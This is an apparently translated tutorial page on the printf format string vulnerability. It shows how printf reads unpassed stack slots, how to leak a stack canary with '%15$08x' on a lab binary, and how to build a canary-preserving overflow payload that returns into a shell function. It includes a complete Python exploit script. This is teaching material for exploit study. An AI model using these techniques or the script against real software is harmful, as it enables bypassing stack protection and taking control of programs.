Buffer overflow: the printf format string vulnerability

2025-01-15 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

0x00 Video version:

If the text is too dry, there is a video version of this article at https://edu.51cto.com/sd/16514

0x01 Fundamentals:

In C, printf is called as printf(format, ...). printf is one of the few variadic library functions in C: it cannot know how many arguments were actually passed to it. (In 32-bit code all arguments are pushed on the stack, so printf has no way of telling how many of the values on the stack are really its arguments.) Take printf("My name is %s %s"): the format asks for two arguments, but we passed none. printf will still fetch two 4-byte values from the stack, namely the slots just above the format-string pointer, which the author writes as format+4 and format+8, and use them to fill in the two %s conversions.

Here's an example:

Compile with gcc -m32 -O0 base.c -o ./base so that the binary is 32-bit.

This is our test code: the printf call contains a %s, but no matching argument is passed. Let's look at what it prints:

You will find that although we never passed the str variable, its contents were printed anyway. Let's debug in GDB and check whether the %s was really filled from the slot at format+4, as described above.

When execution reaches the call to printf, we pause and look at the data in the stack:

The format pointer is 0x8048580 and it sits at stack address 0xffffd5c0; the slot at format+4 computed earlier holds the pointer to the str string (margin), which is exactly what got printed, so the explanation checks out.

Following this idea: since %s can print from the stack, can we print the whole stack? One %s reads format+4, two %s read format+4 and format+8, and so on, so by chaining conversions we can walk the entire stack. (In practice %x or %p is the safer choice for dumping raw stack values: %s dereferences each slot as a pointer and crashes as soon as it hits a slot that is not a valid address.) Next, let's test the idea with an experiment.
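As an added illustration (this is not code from the article), here is a small Python model of how printf consumes its stack slots. It parses a format string and reports which slot each conversion fetches, counting slot 1 as format+4 in the author's notation, so you can see which reads go past the arguments the caller actually supplied. It assumes 32-bit (4-byte slots) and constructs its own sample formats, including the %N$08x positional form that reads a single chosen slot.

```python
import re

# One printf conversion: %[N$][flags][width][.precision][length]conv.
# C99 subset sufficient for auditing; the regex is written for this example.
_CONV = re.compile(
    r"%(?:(?P<pos>\d+)\$)?"           # optional positional argument  %N$
    r"[-+ #0]*"                       # flags
    r"(?P<width>\*|\d+)?"             # '*' width fetches an int from the stack
    r"(?:\.(?P<prec>\*|\d+))?"        # '*' precision fetches one too
    r"(?P<len>hh|h|ll|l|j|z|t|L)?"    # length modifier
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"
)


def stack_reads(fmt, slot_bytes=4):
    """Return [(slot, conv), ...] in the order printf fetches them.

    Slot 1 is the word directly above the format pointer (format+4 in the
    article's notation), slot 2 is format+8, and so on.  printf does not know
    how many arguments exist, so every entry is a stack read whether or not
    the caller passed anything.  Assumes 32-bit: 4-byte slots, with 8-byte
    arguments (long long, double) spanning two slots in sequential mode.
    """
    reads = []
    next_slot = 1
    for m in _CONV.finditer(fmt):
        conv = m.group("conv")
        if conv == "%":
            continue                      # "%%" prints '%' and fetches nothing
        for star in ("width", "prec"):
            if m.group(star) == "*":
                reads.append((next_slot, "*"))
                next_slot += 1
        if m.group("pos"):
            # %N$: fetch argument N directly, leaving the sequential cursor
            # alone (assumes the earlier arguments are all one slot wide)
            reads.append((int(m.group("pos")), conv))
            continue
        reads.append((next_slot, conv))
        wide = m.group("len") == "ll" or conv in "eEfFgGaA"
        next_slot += 8 // slot_bytes if wide else 1
    return reads


def unpassed_reads(fmt, nargs):
    """Reads beyond the nargs arguments the caller really passed.  These come
    straight out of the caller's frame: locals, saved registers, the canary."""
    return [r for r in stack_reads(fmt) if r[0] > nargs]


def leak_probe(index, positional=True):
    """Format string that dumps stack slot `index` as 8 zero-padded hex digits.
    %x/%p just print the word; %s would dereference it and crash on a slot
    that is not a valid pointer, so prefer %x for blind stack dumps."""
    if positional:
        return "%{}$08x".format(index)
    return "%08x" * index                 # the wanted slot is the last 8 digits


if __name__ == "__main__":
    # The article's example: two %s conversions but no arguments at all.
    print(unpassed_reads("My name is %s %s", nargs=0))   # [(1, 's'), (2, 's')]
    # A user-controlled format carrying the probe for slot 15.
    print(stack_reads(leak_probe(15)))                    # [(15, 'x')]
    for slot, conv in stack_reads("%x" * 4):
        print("slot %d -> format+%d (%%%s)" % (slot, 4 * slot, conv))
```

The model treats a user-controlled format the way printf does: the number of fetches is decided entirely by the string, so unpassed_reads() on printf(name) with nargs=0 lists every word the attacker can pull off the stack.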

What we do next is use printf's format string vulnerability to leak the value of the canary, so that we can bypass the stack protector.

Step 1: analyze the C code.

The func function calls printf with a user-controlled string as the format, which is a format string vulnerability; the correct call would be printf("My name is %s", name).

Compile: gcc -fstack-protector -m32 -O0 c.c -o ./c

Step 2: find the position (offset) of the canary

The idea: find the position x of our input, find the position y of the canary, and the offset is the difference.

Set a breakpoint on printf: b printf

Run the program in gdb with r, and when prompted type aaaa (anything works; aaaa is chosen because it is easy to spot in the stack dump as 61616161).

1. Get the canary's value. The canary is loaded from gs:0x14 while func is running, so we only need to catch it there. Run disass func to view the assembly of func and set a breakpoint at 0x080484ea, the instruction that reads gs:0x14 (the canary).

Breakpoint: b *0x080484ea. Once execution stops there, enter n twice to step past mov dword ptr [ebp-0xc], eax; the canary value is now in eax (and stored at ebp-0xc).

You can see that the canary's value is 0xb26f7f00 (the lowest byte is 0x00 by design, so string functions and a %s read stop at it).

Now set b printf and continue with c to that breakpoint (the program prompts for input in between; enter margin).

2. Find the canary's location in the stack: p $ebp (the canary sits just below ebp, at ebp-0xc).

Find where ebp points in the stack and run stack 0x28 (a peda/pwndbg command that shows forty entries of stack data).

The stack frame layout, from low to high addresses, is: our input buffer, the canary at ebp-0xc, 8 bytes of padding, the saved ebp, then the return address:

You can see the canary at 0xffffd5ec. The pointer to the string we entered (margin) is at 0xffffd5b0 and points to 0xffffd5cc, where the string itself lives, so the distance from our input to the canary is 0xffffd5ec - 0xffffd5cc = 32: we need 32 bytes of input to reach the canary, and the next 4 bytes overwrite it.

Step 3: obtaining the canary dynamically

We now know the offset of the canary but not its value, which changes on every run, so we use printf's format string vulnerability (recall format+4 from above). From the screenshot in the previous step, the canary slot is the 15th parameter counting from printf's first parameter, so entering %x fifteen times prints the canary as the last 8 hex digits of the output; more compactly, %15$08x prints only that slot. (Do not use %s here: it would dereference the canary as a pointer and crash.)

Step 4: get a shell

The program already contains an exploit function that gives us a shell directly, so it is enough to overwrite func's return address with the address of exploit.

From the screenshot in the previous step, the canary sits at ebp-0xc, so after the 4-byte canary another 12 bytes (8 bytes of padding plus the saved ebp) bring us to the return address. The payload is therefore:

'a' * 32 + canary +'a' * 12 + exploit address

The python code is:
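The exploit script itself did not survive in this copy of the page. What follows is an added example script of my own, not the author's code: it encodes the frame arithmetic from the GDB session above (the addresses 0xffffd5b0, 0xffffd5cc and 0xffffd5ec) to derive the %15$08x leak and the 32-byte offset, parses the leaked canary, and builds the 'a' * 32 + canary + 'a' * 12 + exploit payload. The interaction with ./c is an assumption: it presumes the program reads a name, prints it with printf, and then reads again into the overflowable buffer within the same process, and it takes the address of exploit from the command line (for example from nm ./c | grep exploit), since the page does not give it.

```python
import struct
import subprocess
import sys

# Stack addresses taken from the article's GDB session on ./c (32-bit binary,
# ASLR disabled, so the frame is laid out identically on every run).
FMT_SLOT_ADDR = 0xffffd5b0   # slot holding printf's format pointer (our name pointer)
INPUT_ADDR    = 0xffffd5cc   # where the bytes we typed actually live
CANARY_ADDR   = 0xffffd5ec   # ebp-0xc


def canary_index(fmt_slot=FMT_SLOT_ADDR, canary_addr=CANARY_ADDR, slot_bytes=4):
    """printf argument number whose slot is the canary.  Argument k lives k
    slots above the format-pointer slot (format+4*k in the article's notation),
    so k = (canary_addr - fmt_slot) / slot_bytes."""
    return (canary_addr - fmt_slot) // slot_bytes


def canary_offset(input_addr=INPUT_ADDR, canary_addr=CANARY_ADDR):
    """Bytes of input needed to walk from the start of our buffer to the canary."""
    return canary_addr - input_addr


def leak_format(index):
    """Positional probe printing only slot `index`, zero-padded to 8 hex digits
    (equivalent to writing %x that many times and keeping the last 8 digits)."""
    return "%{}$08x".format(index)


def parse_canary(output):
    """The probe prints the canary as the last 8 hex digits of the line."""
    return int(output.strip()[-8:], 16)


def build_payload(canary, exploit_addr, buf_to_canary=32, canary_to_ret=12):
    """'a'*32 + canary + 'a'*12 + exploit address, all little-endian 32-bit:
    the 12 bytes after the canary cover ebp-8..ebp-1 and the saved ebp."""
    return (b"a" * buf_to_canary
            + struct.pack("<I", canary)          # keeps the canary's 0x00 low byte
            + b"a" * canary_to_ret
            + struct.pack("<I", exploit_addr))


def main(binary, exploit_addr):
    # Assumed program flow: read name -> printf(name) -> read again into the
    # buffer that overflows.  Leak and overwrite must hit one process because
    # the canary is regenerated for every new run.
    p = subprocess.Popen([binary], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    p.stdin.write((leak_format(canary_index()) + "\n").encode())
    p.stdin.flush()
    canary = parse_canary(p.stdout.readline().decode(errors="replace"))
    print("canary = 0x%08x (offset %d bytes)" % (canary, canary_offset()))
    p.stdin.write(build_payload(canary, exploit_addr) + b"\n")
    p.stdin.write(b"id\n")                       # first command for the spawned shell
    p.stdin.flush()
    out, _ = p.communicate(timeout=5)
    sys.stdout.write(out.decode(errors="replace"))


if __name__ == "__main__":
    # usage: python3 exp.py ./c <exploit address in hex, e.g. from `nm ./c | grep exploit`>
    main(sys.argv[1], int(sys.argv[2], 16))
```

Because the leak and the overflow must reach the same process (a fresh run gets a fresh canary), the script keeps a single pipe open for both steps. If ./c does not flush its output, readline() blocks: run it as stdbuf -o0 ./c or through a pty, which is what pwntools does for you. The canary's low byte is 0x00, which struct.pack writes faithfully; the read in func that overflows must accept embedded NUL bytes, as gets() or read() do, for the payload to arrive intact.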
